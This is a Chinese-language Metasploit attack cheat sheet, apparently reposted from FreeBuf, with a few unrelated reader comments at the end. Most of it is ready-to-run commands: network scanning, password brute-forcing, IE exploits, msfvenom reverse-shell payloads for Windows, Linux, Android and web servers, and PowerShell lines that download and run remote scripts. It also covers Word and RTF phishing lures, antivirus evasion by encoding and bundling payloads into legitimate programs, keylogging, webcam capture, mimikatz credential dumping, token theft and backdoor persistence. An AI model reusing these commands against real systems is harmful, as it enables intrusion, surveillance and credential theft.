MSF 信息收集
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。
专业术语
- 渗透攻击(exploit)
- 测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。
- 攻击载荷(payload)
- 攻击者在目标系统上执行的一段攻击代码,该代码具有返弹连接,创建用户,执行其他系统命令的功能
- shellcode
- 在目标机器上运行的一段机器指令,成功执行后会返回一个shell
- 模块(module)
- 是指Metasploit框架中所使用的一段软件代码组件。
- 监听器(listener)
- 监听器是metasploit中用来等待介入网络连接的组件。
MSF基础知识
运行 msfconsole 即可打开msf命令控制接口
当打开msfconsole后,大家请看红色的方框。这里面清楚的标记了Metasploit所有的利用模块、payload等等
全部参数的解释和利用
Help参数
启动设置
- service postgresql start
- service metasploit start
- msfconsole
- 进入后输入db_status 查看数据库连接状态
- workspace -a test 创一个工作台
- 删除 -d 选项
- 进入test工作台
- Wordspace test
- 使用nmap
- db_nmap -sS 192.168.80.1 扫描主机
- db_export 1.xml 导出扫描结果
- db_import 1.xml 导入扫描结果
- hosts 查看扫描结果
信息搜集
- ①whois查询:
- msf > whois example.com
- msf> whois 192.168.1.100
- ②http://searchdns.netcraft.com/在线收集服务器 IP信息工具
- ③nslookup
- msf> db_nmap –sS –A192.168.1.111
- msf> db_services #查看扫描结
高级扫描方式
- ①msf> use auxiliary/scanner/ip/ipidseq #IPID序列扫描器,与 nmap的-sI -O选项类似
- showoptions
- set RHOSTS 192.168.1.0/24
- set RPORT8080
- setTHREADS 50
- run
- ( RHOSTS、 RPORT等参数也可以用小写)
使用 portscan模块
- msf> search postscan
- msf> use auxiliary/scanner/postscan/syn
- set RHOSTS 192.168.1.111
- setTHREADS 50
- run
特定扫描
- smb_version 模块:
- msf> use auxiliary/scanner/smb/smb_version
- showoptions
- set RHOSTS 192.168.1.111
- run
- db_hosts –c address,os_flavor
找 mssql 主机:
- msf> use auxiliary/scanner/mssql/mssql_ping
- showoptions
- set RHOSTS 192.168.1.0/24
- setTHREADS 255
- run
SSH 服务器扫描:
- msf> use auxiliary/scanner/ssh/ssh_version
- set RHOSTS 192.168.1.0/24
- setTHREADS 50
- run
Telnet服务器扫描:
- msf> use auxiliary/scanner/telnet/telnet_version
- set RHOSTS 192.168.1.0/24
- setTHREADS 50
- run
FTP 主机扫描:
- msf> use auxiliary/scanner/ftp/ftp_version
- Show options
- set RHOSTS 192.168.1.0/24
- setTHREADS 255
- run
描 FTP 匿名登录:
- useauxiliary/scanner/ftp/anonymos
- set RHOSTS 192.168.1.0/24
- setTHREADS 50
- run
扫描局域网内有哪些主机存活
- use auxiliary/scanner/discovery/arp_sweep
- set RHOSTS 192.168.1.0/24
- set THREADS 50
run
扫描网站目录
- auxiliary/scanner/http/dir_scanner
- set RHOSTS 192.168.1.1
- set THREADS 50
run搜索网站中的E-mail地址
- search_email_collector
- use auxiliary/gather/search_email_collector
- set DOMAIN cracer.com
- run
嗅探抓包
- msf> use auxiliary/sniffer/psnuffle
- run
MSF 密码破解
ssh服务口令猜测
- use auxiliary/scanner/ssh/ssh_login
- set RHOSTS 192.168.80.134
- set USERNAME root
- set PASS_FILE /root/pass.txt
- set THREADS 50
- run
mysql口令攻击
- search mysql
- use auxiliary/scanner/mysql/mysql_login
- show options
- set RHOSTS 192.168.80.130
- set user_file /root/user.txt
- set pass_file /root/pass.txt
- exploit
postgresql攻击
- search postgresql
- use auxiliary/scanner/postgres/postgres_login
- show options
- set RHOSTS 192.168.80.130
- set user_file /root/user.txt
- set pass_fiel /root/pass.txt
- exploit
tomcat 攻击
- search tomcat
- use auxiliary/scanner/http/tomcat_mgr_login
- set RHOSTS 192.168.1.1
- set PASS_FILE /root/pass.txt
- set USER_FILE /root/user.txt
- exploit
telnet 攻击
- use auxiliary/scanner/telnet/telnet_login
- set 192.168.1.1
- exploit
samba攻击
- use auxiliary/scanner/smb/smb_login
- set RHOSTS 192.168.1.1 /192.168.1.0/24
- set THREADS 200
- exploit
MSF 漏洞利用
Metasploit 常用漏洞利用命令(一)
search <name>
用指定关键字搜索可利用漏洞
use <exploit name>
使用漏洞
show options
显示选项
set <OPTION NAME> <option>
设置选项
show payloads 显示装置
Metasploit 常用漏洞利用命令(二)
- show targets 显示目标(os版本)
- set TARGET <target number> 设置目标版本
- exploit 开始漏洞攻击
- sessions -l 列出会话
- sessions -i <ID> 选择会话
- sessions -k <ID> 结束会话
- <ctrl> z 把会话放到后台
- <ctrl> c 结束会话
Metasploit 常用漏洞利用命令(三)
- show auxiliary 显示辅助模块
- use <auxiliary name> 使用辅助模块
- set <OPTION NAME> <option> 设置选项
- run 运行模块
ms10_002漏洞利用
- use windows/browser/ms10_002_aurora
- set payload windows/meterpreter/reverse_tcp
- show options
- set SRVPORT 80
- set URIPATH /
- set LHOST 192.168.2.128
- set LPORT 444
exploit
ms10_018漏洞利用
漏洞描述:
Microsoft IE畸形对象操作内存破坏漏洞(MS10-018)
受影响系统:
- Microsoft Internet Explorer 7.0
- Microsoft Internet Explorer 6.0 SP1
- Microsoft Internet Explorer 6.0
Internet Explorer是Windows操作系统中默认捆绑的web浏览器
Internet Explorer通过使用dll组件提供对Web文件夹和打印的支持,该组件中存在释放后使用错误。如果用户加载了特制的HTML文档或Office文件,未经认证的远程攻击者就可以导致拒绝服务或执行任意代码。
客户端
如上还有许多,请有兴趣的朋友自行收集搭建
复现
MSF PAYLOAD
msfvenom简介
- msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。
- msfvenom所有参数
常用参数
- 比如想查看windows/meterpreter/reverse_tcp支持什么平台、哪些选项,可以使用msfvenom -p windows/meterpreter/reverse_tcp –list-options
- msfvenom –list payloads可查看所有payloads
- msfvenom –list encoders可查看所有编码器
- 评级最高的两个encoder为cmd/powershell_base64和x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器
- 类似可用msfvenom –list命令查看的还有payloads, encoders, nops, platforms, archs, encrypt, formats
监听参数
- 防止假session
- 在实战中,经常会遇到假session或者刚连接就断开的情况,这里补充一些监听参数,防止假死与假session。
- msf exploit(multi/handler) > set ExitOnSession false
- //可以在接收到seesion后继续监听端口,保持侦听。
- 防止session意外退出
- msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0
- //默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
- msf5 exploit(multi/handler) > set SessionExpirationTimeout 0
- //默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭
handler后台持续监听
- msf exploit(multi/handler) > exploit -j -z
- 使用exploit -j -z可在后台持续监听,-j为后台任务,-z为持续监听,使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。
- 还有种比较快捷的建立监听的方式,在msf下直接执行:
- msf5 > handler -H 192.168.8.124 -P 1122 -p windows/meterpreter/reverse_tcp
payload的可持续化(这里更推荐cs)
- 一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使用migrate进行。
- 其实在生成payload时可直接使用如下命令,生成的payload会直接注入到指定进程中。
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e x86/shikata_ga_nai -b “\x00” -i 5 -a x86 –platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o exe
- 生成的shell程序执行后会启动两个进程exe和svchost.exe,关闭其中一个不会影响会话状态。
- 在上面的生成payload参数中:
- (1)PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到exe进程,自己测试的时候不建议到这个进程而是其他的持久进程。
- (2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为exe,保存在根目录下。
各平台payload生成
- Linux
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -a x86 –platform Linux -f elf > shell.elf
- Windows
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
- msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe > shell.exe
- Mac
- msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
- Android
- msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f raw > shell.apk
- msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 R > test.apk
生成脚本payload
- Powershell
- msfvenom -a x86 –platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
- Netcat
- nc正向连接
- msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.8.124 LPORT=1122 -f exe> 1.exe
- nc反向连接,监听
- msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe> 1.exe
生成脚本payload
- PHP
- msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
- cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
- ASP
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
- JSP
- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
- WAR
- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
侦听Handlers
- use exploit/multi/handler
- set PAYLOAD <Payload name>
- set LHOST 192.168.8.124
- set LPORT 1122
- set ExitOnSession false
- exploit -j -z
Powershell 配合msf无文件攻击
- 生成ps脚本
- msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1121 -f psh-reflection >x.ps1
- 设置侦听
- use exploit/multi/handler
- set payload windows/x64/meterpreter/reverse_tcp
- Set lhost 192.168.3.107
- Run
- 客户端运行
- powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.8.1/x.ps1’)
Powershell配合word伪装木马执行
- 新建word设置域,
- DDEAUTO C:\\windows\\system32\\cmd.exe “/k powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.3.1/x.ps1’) “
msf使用宏钓鱼
git clone https://github.com/bhdresh/CVE-2017-8759.git
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.73.129/logo.txt
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1133 -f exe > /root/shell.exe
python cve-2017-8759_toolkit.py -M exp -e http://192.168.8.124/shell.exe -l shell.exe
开启监听模块,发送给目标运行钓鱼文件,等代上线
msf制作excel钓鱼
- use exploit/multi/script/web_delivery
- set target 2
- set payload windows/meterpreter/reverse_tcp
- set LHOST 192.168.3.143
- set URIPATH /
- exploit
使用ngrock穿透内网
- 设置ngrock隧道
- 本机安装客户端
- ./sunny clientid id号
Msf5-Evasion模块免杀
- 2019年1月,metasploit升级到了0,引入了一个新的模块叫Evasion模块,官方宣称这个模块可以创建反杀毒软件的木马。
- evasion有以下几个模块,可以使用show evasion进行查看。
使用use windows/windows_defender_exe进行生成payload
- msf5 > use windows/windows_defender_exe
- msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
- msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
- msf5 evasion(windows/windows_defender_exe) > set LHOST 192.168.8.124
- msf5 evasion(windows/windows_defender_exe) > set LPORT 1122
- msf5 evasion(windows/windows_defender_exe) > run
- 设置侦听
- handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp
捆绑免杀
- 生成payload 捆绑exe
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -x putty.exe -f exe -o payload3.exe
- 捆绑编码免杀
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe
- 多重编码免杀
- msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.8.124 LPORT=1122 -f raw | msfvenom -a x86 –platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 –platform windows -e x86/shikata_ga_nai -b “&” -i 4 -f raw | msfvenom -a x86 –platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > shell.exe
- http://virustotal.com/ 验证静态免杀 bypass
shellter免杀
- shellcode代码注入工具
- https://www.shellterproject.com/download/
免杀msfpayload
- 生产py文件的payload
- msfVENOM -p windows/x64/meterpreter/reverse_tcp LPORT=10003 LHOST=119.28.66.234 -e x86/shikata_ga_nai -i 17 -f py -o /root/121.py
- 建立侦听
MSF 后渗透模块
基本命令
- 进程迁移
- run post/windows/manage/migrate
- 关闭杀软
- run killav
- 通过其 shell 来关闭防火墙
- netsh adcfirewall set allprofiles state off
- 查看目标机所有流量
- run packetrecorder -i 1
- 提取系统信息
- run scraper
- ps 查看进程
- migrate 1774 切换进程
- 截屏screenshot
- 获取系统运行的平台sysinfo
- run getgui -e 开启目标主机远程桌面
- sysinfo 命令为显示远程主机的系统信息
- execute -f notepad.exe
- execute -h 显示帮助信息。-f为执行要运行的命令
- 如果希望隐藏后台执行,加参数-H
- execute -H -f notepad.exe
基本操作命令
- cat c:\boot.ini#查看文件内容,文件必须存在
- del c:\boot.ini #删除指定的文件
- upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload exe C:\\windows\\system32\
- download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\\boot.ini /root/
- edit c:\boot.ini # 编辑文件
- getwd#打印工作目录
- cd#更改本地目录
- ls#列出在当前目录中的文件列表
- pwd#输出工作目录
- cd c:\\ #进入目录文件下
- rm file #删除文件
- mkdir dier #在受害者系统上的创建目录
- rmdir#受害者系统上删除目录
- dir#列出目标主机的文件和文件夹信息
- mv#修改目标主机上的文件名
- search -d d:\\www -f web.config #search 文件,如
- search -d c:\\ -f *.doc
run vnc 查看桌面
摄像头命令
- record_mic #音频录制
- webcam_chat #查看摄像头接口
- webcam_list #查看摄像头列表
- webcam_stream #摄像头视频获取
端口转发
- portfwd -h
- 用法:portfwd [-h] [add | delete | list | flush] [args]
- 选项:
- -L <opt>要监听的本地主机(可选)
- -h帮助横幅
- -l <opt>要监听的本地端口
- -p <opt>连接到的远程端口
- -r <opt>要连接到的远程主机
- portfwd add -l 4444 -p 3389 -r 192.168.1.102 # 端口转发,本机监听4444,把目标机3389转到本机4444
- rdesktop -u Administrator -p bk#123 127.0.0.1:4444 #使用rdesktop来连接桌面,-u 用户名 -p 密码
- rdesktop 127.1.1.0:4444#需要输入用户名和密码远程连接
shell网络环境
- meterpreter>run get_local_subnets
- 添加一条通向目标服务器内网的路由
- meterpreter>run autoroute -s 100.0.0.0/8 #(根据目标内网网络而定)
- 查看路由设置:
- meterpreter>run autoroute –p
- 一般来说,在meterpreter中设置路由便可以达到通往其内网的目的。然而有些时候还是会失败,这时我们可以background返回msf>,查看下外面的路由情况
- route print
- 如果发现没有路由信息,说明meterpreter shell设置的路由并没有生效,我们可以在msf中添加路由。
- msf>route add 10.0.0.0 255.0.0.0 1
- 说明:1表示session 1,攻击机如果要去访问0.0.0/8网段的资源,其下一跳是session1,至于什么是下一条这里不多说了,反正就是目前攻击机可以访问内网资源了。
键盘记录
- keyscan_start:开启键盘记录功能
- keyscan_dump:显示捕捉到的键盘记录信息
- keyscan_stop:停止键盘记录
- add_user username password -h ip #在远程目标主机上添加一个用户
- add_group_user “Domain Admins” username -h ip #将用户添加到目标主机的域管理员组中
Hash获取
- meterpreter > load mimikatz #加载mimikatz
- meterpreter > msv #获取hash值
- meterpreter > kerberos #获取明文
- meterpreter >ssp #获取明文信息
- meterpreter > wdigest #获取系统账户信
- meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示
- meterpreter >mimikatz_command -f hash:: #获取目标 hash
- meterpreter > mimikatz_command -f samdump::hashes
- meterpreter > mimikatz_command -f sekurlsa::searchPa
- run post/windows/gather/smart_hashdump
抓包嗅探
- use sniffer # 加载嗅探模块
- sniffer_interfaces #列出目标主机所有开放的网络接口
- sniffer_start 2 #获取正在实施嗅探网络接口的统计数据
- sniffer_dump 2 /tmp/test2.cap #在目标主机上针对特定范围的数据包缓冲区启动嗅探
- sniffer_stop 2 #停止嗅探
- 对抓取的包进行解包:
- use auxiliary/sniffer/psnuffle
- set pcapfile 1.cap
- run
- wireshark,加载这个/tmp/xpsp1.cap 也可
盗取令牌
- meterpreter >use incognito 加载incoginto功能(用来盗窃目标主机的令牌或是假冒用户)
- meterpreter >list_tokens -u 列出目标主机用户的可用令牌
- meterpreter >list_tokens -g 列出目标主机用户组的可用令牌
- meterpreter >impersonate_token DOMAIN_NAME\\USERNAME 假冒目标主机上的可用令牌,如meterpreter > impersonate_token QLWEB\\Administrato
持久控制服务器
- 前提条件服务器系统可以
- run metsvc 安装后门
- msfconsole
- use exploit/multi/handler
- set payload windows/metsvc_bind_tcp
- set LPORT 31337
- set RHOST 192.168.2.131
- run
部分模块因更新原因,新版kali中的metasploit可能不支持部分操作,若测试失败建议更换至20或21版kali
本文转载于FreeBuf.COM原作者qinglei
原地址:渗透测试之Metasploit – FreeBuf网络安全行业门户
若侵权请联系删除
cesfe 2个月前0
好的,谢谢昶之琴 2个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 2个月前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下